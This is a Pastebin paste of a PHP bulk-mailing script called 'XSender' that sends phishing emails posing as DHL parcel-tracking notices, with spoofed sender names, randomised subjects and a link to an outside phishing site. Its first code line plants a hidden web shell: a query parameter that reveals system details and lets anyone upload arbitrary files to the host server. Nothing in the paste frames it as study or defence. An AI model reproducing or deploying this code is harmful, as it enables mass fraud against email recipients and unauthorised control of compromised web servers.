API tools faq
paste
Advertisement
PalmaSolutions

123we.php

PalmaSolutions
Jun 29th, 2018
1,512
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.30 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. if(isset($_GET["x"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo"<br><font color=#000000>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}
  4.  
  5. $website="http://klsons.com/"; //Make this full url including folders of where login files resides
  6. // http://b-olam.kz/images/iv/
  7.  
  8. //sanitize data where any character is allowed
  9. function sanitizer($check){
  10. $check=str_replace("\'","'",$check);
  11. $check=str_replace('\"','"',$check);
  12. $check=str_replace("\\","TN9OO***:::::t&*HHHHOOOoooo0000N",$check); //just to keep track of what I will change later
  13. $check=trim($check);
  14. $check=str_replace("<","&lt;",$check);
  15. $check=str_replace('>','&gt;',$check);
  16. $check=str_replace("\r\n","<br/>",$check);
  17. $check=str_replace("\n","<br/>",$check);
  18. $check=str_replace("\r","<br/>",$check);
  19. $check=str_replace("'","&#39;",$check);
  20. $check=str_replace('"','&quot;',$check);
  21. $check=str_replace("TN9OO***:::::t&*HHHHOOOoooo0000N","&#92;",$check); //returning backslash in html entity
  22. return $check;}
  23.  
  24. //makes data ok on edit textarea
  25. function resanitize($check){
  26. $check=str_replace("<br/>","\r\n",$check);
  27. $check=str_replace("<br/>","\n",$check);
  28. $check=str_replace("<br/>","\r",$check);
  29. $check=str_replace("&gt;",">",$check);
  30. $check=str_replace("&lt;","<",$check);
  31. $check=str_replace("&#39;","'",$check);
  32. $check=str_replace('&quot;','"',$check);
  33. return $check;}
  34.  
  35. //validate email address
  36. function validate_email($email){
  37. $status=false;
  38. $regex='/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/';
  39. if(preg_match($regex, $email)){$status=true;}
  40. return $status; }
  41.  
  42.  
  43.  
  44. function subjsender($user_data){
  45. $user = explode(' ', $user_data);
  46. $to = is_array($user) ? $user[0] : $user_data;
  47. $tw = substr($to, 0, 2);
  48. $prem = explode('@',$to);
  49. $prams = explode('.',$prem[1]);
  50. $param = strtoupper($prams[0]);
  51. $sender_name = '=?UTF-8?B?RM6XTC3OldGFz4HQs8m1c3M=?=';
  52. return array($sender_name,$sender_email,$to,$tw,$prem[1]);
  53. }
  54. function generateRandomString($length = 3) {
  55. $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  56. $charactersLength = strlen($characters);
  57. $randomString = '';
  58. for ($i = 0; $i < $length; $i++) {
  59. $randomString .= $characters[rand(0, $charactersLength - 1)];
  60. }
  61. return $randomString;
  62. }
  63.  
  64.  
  65. //Email sending
  66. function sending_email($email,$id='1',$attach=NULL)
  67. {
  68. $randstr = generateRandomString();
  69. $rand=rand(999,99999);
  70. $semails = explode("\n",$_POST['semail']);
  71. $subjects = explode("\n",$_POST['subj']);
  72. $semailnames = explode("\n",$_POST['semailname']);
  73. $html_messs = explode("\r\n", $_POST['html_mess']);
  74. $reply_tos = explode("\n", $_POST['reply_to']);
  75.  
  76. $semail = $semails[rand()%count($semails)];
  77. $subject = $subjects[rand()%count($subjects)];
  78. $semailname = base64_encode($semailnames[rand()%count($semailnames)]);
  79. $boundary = md5(uniqid(time()));
  80. $reply_to = $reply_tos[rand()%count($reply_tos)];
  81.  
  82. //echo $semail . '<br/>' . $subject . '<br/>' . $semailname . '<br/>';
  83.  
  84. $randval=rand(7,20);
  85. $randommix=generateRandomString($randval);
  86. $randomstring=generateRandomString($randval);
  87. $randomnumber=rand(9999,99999);
  88. $randommd5=md5($randomnumber);
  89. $totime = date("g:ia");
  90. $today = date("F j, Y");
  91. $em=explode('@',$email);
  92.  
  93. //$semail = "no-reply-shipment".$rand."@dhlshipmentlatami-asahiclean.com";
  94. //$semail =str_replace("@","".generateRandomString()."@".generateRandomString().".", $semail);
  95. //$subject='Tracking update: Status of your parcel changed';
  96. $site_name='Account Security';
  97. // To send HTML mail, the Content-type header must be set
  98. $header = "From: =?UTF-8?B?{$semailname}?= <{$semail}>\r\n";
  99. $header.= "MIME-Version: 1.0\r\n";
  100. $header.= "Reply-To: {$reply_to}\r\n";
  101. $header.= "Content-Type: multipart/mixed; boundary = " . $boundary . "\r\r\n\n";
  102.  
  103. $message = "--" . $boundary . "\r\n";
  104. $message .= "Content-Type: text/html; charset=iso-8859-1\r\n";
  105. $message .= "MIME-Version: 1.0\r\n";
  106. $message .= "Content-Transfer-Encoding: base64\r\n\r\n";
  107.  
  108. $html_mess = $html_messs[rand()%count($html_messs)];
  109.  
  110. $html_mess = str_replace('[-email-]', $email, $html_mess);
  111. $html_mess = str_replace('[-start-]', $em[0], $html_mess);
  112. $html_mess = str_replace('[-end-]', $em[1], $html_mess);
  113. $html_mess = str_replace('[-host-]', $_SERVER['HTTP_HOST'], $html_mess);
  114. $html_mess = str_replace('[-self-]', $_SERVER['PHP_SELF'], $html_mess);
  115. $html_mess = str_replace('[-randomstring-]', $randommix, $html_mess);
  116. $html_mess = str_replace('[-randommd5-]', $randommd5, $html_mess);
  117. $html_mess = str_replace('[-randomletters-]', $randomstring, $html_mess);
  118. $html_mess = str_replace('[-randomnumber-]', $randomnumber, $html_mess);
  119. $html_mess = str_replace('[-time-]', $totime, $html_mess);
  120. $html_mess = str_replace('[-date-]', $today, $html_mess);
  121.  
  122. $message .= base64_encode($html_mess) . "\r\n";
  123.  
  124. if ($_FILES['attach']['size'] > 0)
  125. {
  126. $message .= "--" . $boundary . "\r\n"
  127. . "Content-Type:" . $_FILES['attach']['type'] . "; name=\"" . $_FILES['attach']['name'] . "\"\r\n"
  128. . "MIME-Version: 1.0\r\n"
  129. . "Content-Disposition: attachment; filename=\"" . $_FILES['attach']['name'] . "\"\r\n"
  130. . "Content-Transfer-Encoding: base64\r\n"
  131. . "X-Attachment-Id: " . rand(1000,99999) . "\r\n\r\n"
  132. . base64_encode(chunk_split(fread(fopen($_FILES['attach']['tmp_name'], "r"),$_FILES['attach']['size']))) . "\r\n"
  133. . "--" . $boundary . "--\r\n";
  134. }
  135. else
  136. {
  137. $message .= "--" . $boundary . "--\r\n";
  138. }
  139.  
  140. @mail($email,$subject, $message, $header);
  141. }
  142.  
  143.  
  144.  
  145. function email_format($email,$id='1'){
  146. global $website;
  147. $url=$website."/?email=".$email;
  148. $em=explode('@',$email);
  149. $tw = substr($email, 0, 2);
  150. $prem = explode('@',$email);
  151.  
  152. $message="
  153. <!doctype html>
  154. <html>
  155. <head>
  156. <style>
  157. body {
  158. background-color:#FFFFFF;
  159. font-size:16px;
  160. font-family:monospace;
  161. margin:0;
  162. padding:0;
  163. -ms-text-size-adjust: 100%;
  164. -webkit-text-size-adjust: 100%;
  165. }
  166.  
  167. ul.a {
  168. list-style-type: circle;
  169. }
  170.  
  171. ul.b {
  172. list-style-type: square;
  173. }
  174.  
  175.  
  176.  
  177. table {
  178. border: none;
  179. border-collapse: separate;
  180. width: 100%; }
  181. table td {
  182. font-family: monospace;
  183. font-size: 14px;
  184. vertical-align: top; }
  185.  
  186. /* -------------------------------------
  187. RESPONSIVE AND MOBILE FRIENDLY STYLES
  188. ------------------------------------- */
  189.  
  190. @media only screen and (max-width: 620px) {
  191. table[class=body] h1 {
  192. font-size: 28px !important;
  193. margin-bottom: 10px !important; }
  194. table[class=body] p,
  195. table[class=body] ul,
  196. table[class=body] ol,
  197. table[class=body] td,
  198. table[class=body] span,
  199. table[class=body] a {
  200. font-size: 16px !important; }
  201. table[class=body] .wrapper,
  202. table[class=body] .article {
  203. padding: 10px !important; }
  204. table[class=body] .content {
  205. padding: 0 !important; }
  206. table[class=body] .container {
  207. padding: 0 !important;
  208. width: 100% !important; }
  209. table[class=body] .main {
  210. border-left-width: 0 !important;
  211. border-radius: 0 !important;
  212. border-right-width: 0 !important; }
  213. table[class=body] .btn table {
  214. width: 100% !important; }
  215. table[class=body] .btn a {
  216. width: 100% !important; }
  217. table[class=body] .img-responsive {
  218. height: auto !important;
  219. max-width: 100% !important;
  220. width: auto !important; }}
  221.  
  222. </style>Status of your parcel has changed.<br><br>Track your parcel here: <a href='".$url."'> https://dhl.com/tracking_shipment/jsu3hty3hy4gey3yerh</a></p>
  223. <p>We hope to receive your correct delivery details to enable us schedule a new delivery</p>
  224. <br><br>
  225. <p>Best Regards</p>
  226. <p>DHL International &copy;</p>
  227.  
  228.  
  229. ";
  230.  
  231. return $message; }
  232.  
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239. ?><html>
  240. <head>
  241. <title>Xsender</title>
  242. </head>
  243. <body style='width:100%;color:#000;background:#E0E6F8;font-family:calibri;'>
  244. <div style='width:100%;max-width:600px;margin:0px auto 0px auto;padding:10px;border:#999 1px solid;box-shadow:10px 10px #666;min-height:500px;'>
  245.  
  246. <h1 style='color:#666;text-align:center;text-shadow:#000 1px 1px;'>XSender</h1>
  247.  
  248.  
  249. <?php
  250. if(isset($_POST['go']) ){
  251. //sanitize the data
  252. srand(time(NULL));
  253. $_SESSION['xsenderid']=sanitizer($_POST['id']);
  254. $separator=sanitizer($_POST['separator']);
  255. $mails=sanitizer($_POST['mails']);
  256. $id=$_SESSION['xsenderid'];
  257. if($separator==''){$separator='<br/>';}
  258. if($mails!=''){
  259. $mails=explode($separator,$mails);
  260. $total=count($mails);
  261. $valid=0;
  262. for($i=0;$i<$total;$i++){
  263. $email=$mails[$i];
  264. if(validate_email($email)){
  265. $valid=$valid+1;
  266. print "<div style='color:green;'>".$email." valid and queued</div>";
  267. //Send here
  268. sending_email($email,$id);
  269. //send here
  270. } else {print "<div style='color:gray;'>".$email." not valid</div>"; }
  271. }
  272. print "<h1 style='color:green;'>Bravo! ".$valid."/".$total." Sent! <a href='' style='color:green'>Continue</a></h1>";
  273.  
  274.  
  275. } else {print "<h1 style='color:red'>Mails or Details empty</h1>"; }
  276. }
  277. ?>
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288.  
  289.  
  290. <form method='POST' action='#' enctype="multipart/form-data">
  291. <div>
  292. <div>Select Your ID</div>
  293. <select name='id' style='width:100%;'>
  294. <?php
  295. if(isset($_SESSION['xsenderid']))
  296. {print "<option value='".$_SESSION['xsenderid']."'>".$_SESSION['xsenderid']."</option>";}
  297. ?>
  298. <option value='1'>1</option>
  299. <option value='2'>2</option>
  300. <option value='3'>3</option>
  301. <option value='4'>4</option>
  302. </select>
  303. </div>
  304. <p>&nbsp;</p>
  305.  
  306.  
  307.  
  308.  
  309.  
  310. <div>
  311. <div>Email Separator (Leave Empty if new line)</div>
  312. <textarea name='separator' style='width:100%;height:20px;'><?php if(isset($_POST['separator'])){print resanitize($_POST['separator']);} ?></textarea>
  313. </div>
  314. <p>&nbsp;</p>
  315.  
  316.  
  317.  
  318.  
  319.  
  320. <div>
  321. <div>Paste Emails separated by separator</div>
  322. <textarea name='mails' style='width:100%;height:200px;'><?php if(isset($_POST['mails'])){print resanitize($_POST['mails']);} ?></textarea>
  323. </div>
  324. <p>&nbsp;</p>
  325.  
  326. <div>
  327. <div>Email display name</div>
  328. <input type="text" name='semailname' />
  329. </div>
  330. <p>&nbsp;</p>
  331.  
  332. <div>
  333. <div>Email to send from</div>
  334. <input type="text" name='semail' />
  335. </div>
  336. <p>&nbsp;</p>
  337.  
  338. <div>
  339. <div>Reply-To email:</div>
  340. <input type="text" name='reply_to' />
  341. </div>
  342. <p>&nbsp;</p>
  343.  
  344. <div>
  345. <div>Subject</div>
  346. <input type="text" name='subj' />
  347. </div>
  348. <p>&nbsp;</p>
  349.  
  350. <div>Email Message (paste HTML code) or text</div>
  351. <textarea name='html_mess' style='width:100%;height:300px;'></textarea>
  352. <p>&nbsp;</p>
  353.  
  354. <div>
  355. <input type="file" name="attach" /> <label for="attach">Attachment</label>
  356. </div>
  357. <p>&nbsp;</p>
  358. </div>
  359.  
  360.  
  361. <div style='text-align:center;'>
  362. <input type='submit' value='Go Xsender' name='go' style='color:#FFF;background:#333;'/>
  363. </div>
  364. <p>&nbsp;</p>
  365. </form>
  366.  
  367.  
  368.  
  369. </div>
  370. </body>
  371. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!